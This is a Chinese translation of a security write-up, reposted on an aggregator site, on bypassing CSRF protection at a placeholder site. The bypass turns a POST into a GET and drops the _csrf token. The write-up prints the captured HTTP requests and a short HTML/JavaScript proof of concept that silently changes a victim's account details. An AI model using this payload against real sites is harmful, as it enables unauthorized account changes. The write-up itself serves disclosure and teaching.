Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

第七篇翻译:bypass CSRF

0
0
嗨,伙计们!与你们分享一些好的东西总是很愉快的。从文章的标题就可以猜到今天我将分享一些关于绕过CSRF防护的技术。 什么是CSRF保护? 简而言之,CSRF(跨站请求伪造)攻击是一种专门针对WEB站点状态更改请求的攻击。为了防止这种攻击,开发人员以多种方式在request请求中添加了ANTI-CSRF token令牌。如果你想了解详细的原理可以看看这两篇文章 “ Article-1 “,” Article-2 “ 现在我们假设站点域名为vulnhost.com,该站点根据一个POST请求提供的数据验证我们的请求。vulnhost.com实际上是先将_csrf token标记到POST请求中,然后再在服务器端验证_csrf token [*]状态更改请求看起来像是下面这样的 POST /mycenter/settings/account.html?2-1.IBehaviorListener.0-formContact-saveContact HTTP/1.1 Host: en.vulnhost.com User-Agent: Mozilla/5.0 (windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: application/xml, text/xml, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://en.vulnhost.com/mycenter/settings/account.html Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Wicket-Ajax: true Migration-Wicket: 6 Wicket-Ajax-BaseURL: mycenter/settings/account.html Wicket-FocusedElementId: id49 X-Requested-With: XMLHttpRequest Content-Length: 246 Cookie: ....... Connection: close . _csrf=725a7f90-192f-4b94-8fc9-6320ace14fef&id48_hf_0=&gender=radio8&firstName=xx&lastName=YY&saveContact=1 这里,_csrf=…. 用来生成随机令牌,并提交给服务端进行验证。如果我利用GET方法发送请求,并将_csrf令牌删除,那么服务端将不会对其进行验证 GET /mycenter/settings/account.html?2-1.IBehaviorListener.0-formContact-saveContact=&id48_hf_0=&gender=radio8&firstName=XX&lastName=YY&saveContact=1 HTTP/1.1 Host: en.vulnhost.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: application/xml, text/xml, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://en.vulnhost.com/mycenter/settings/account.html Wicket-Ajax: true Migration-Wicket: 6 Wicket-Ajax-BaseURL: mycenter/settings/account.html Wicket-FocusedElementId: id49 X-Requested-With: XMLHttpRequest Cookie: ... Connection: close 正如期待的那样,服务端响应200 OK,但是使用典型的HTML POC来更改请求时会出现一些问题。以前我也遇到过,之所以会这样,是因为在这种情况下浏览器需要刷新之后才能渲染请求到的内容。我猜想GET请求包含了一堆HTTP header,这可能会中断更改请求 为了解决这个问题,我结合了javascript和HTML来构造POC

<html> <head> <script type="text/javascript"> var timer = null; function auto_reload() { window.location = 'https://en.vulnhost.com/mycenter/settings/account.html?4-2.IBehaviorListener.0-formContact-saveContact=&id48_hf_0=&gender=radio8&firstName=Account&lastName=Takeover&saveContact=1'; } </script> <body> <!-- Reload page every 5 seconds. --> <body onload="timer = setTimeout('auto_reload()',5000);"> </body> </html>


Viewing all articles
Browse latest Browse all 12749